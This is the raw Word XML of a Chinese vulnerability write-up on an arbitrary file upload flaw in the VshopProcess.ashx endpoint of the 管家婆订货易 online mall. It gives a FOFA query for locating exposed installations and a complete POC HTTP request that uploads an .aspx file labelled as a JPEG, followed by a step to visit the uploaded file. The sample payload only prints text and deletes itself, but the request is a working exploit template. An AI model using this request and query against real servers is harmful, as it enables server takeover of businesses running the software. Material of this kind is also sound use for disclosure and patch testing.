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DBC2B" w14:textId="70CA71B4" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>管家婆订货易在线商城 VshopProcess 任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368887A" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="mwkGA"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>一、漏洞介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C487567" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u7d925e97"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞，恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCDC63" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="l2jAw"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FB859" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="t3E9g"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>步骤一、fofa资产查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C02E3D" w14:textId="77777777" w:rsidR="00572EE7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4" w:name="bFscK"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>title="订货易" || title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA8FF6" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="EOgu1"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>步骤二、以下为POC数据包上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBDE28"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>代码文件后获取上传地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3193E2" w14:textId="77777777" w:rsidR="00572EE7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6" w:name="sT0nx"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5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------WebKitFormBoundarytCOFhbEjc3IfYaY5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Disposition: form-data; name="fileup1i"; filename="ceshi.aspx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: image/jpeg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&lt;%@ Page Language="C#" %&gt;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Response.Write("Hello World!");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>%&gt;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------WebKitFormBoundarytCOFhbEjc3IfYaY5--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502EB77" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="u82b98142"/>
      <w:bookmarkStart w:id="8" w:name="u0bb18e4d"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A590965" wp14:editId="64CA33BE">
            <wp:extent cx="5842000" cy="1875242"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1441648908" name="图片 1441648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308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3C100E12" w14:textId="77777777" w:rsidR="00572EE7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="FLwfx"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>步骤三：访问上传地址页面 有上传文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5191F3" w14:textId="373BD237" w:rsidR="00572EE7" w:rsidRDefault="00000000" w:rsidP="00B9466A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u0d6d5eb1"/>
      <w:bookmarkStart w:id="11" w:name="u5738064a"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C2FE7E0" wp14:editId="14DF4CC7">
            <wp:extent cx="5842000" cy="1121548"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210454812" name="图片 1210454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5866" cy="161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ZWmU2"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:sectPr w:rsidR="00572EE7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572EE7"/>
    <w:rsid w:val="00572EE7"/>
    <w:rsid w:val="00B9466A"/>
    <w:rsid w:val="00CD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6920"/>
  <w15:docId w15:val="{76876AD0-335A-4A06-A826-79142EDE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ae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鹏 王</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-30T07:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-30T07:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>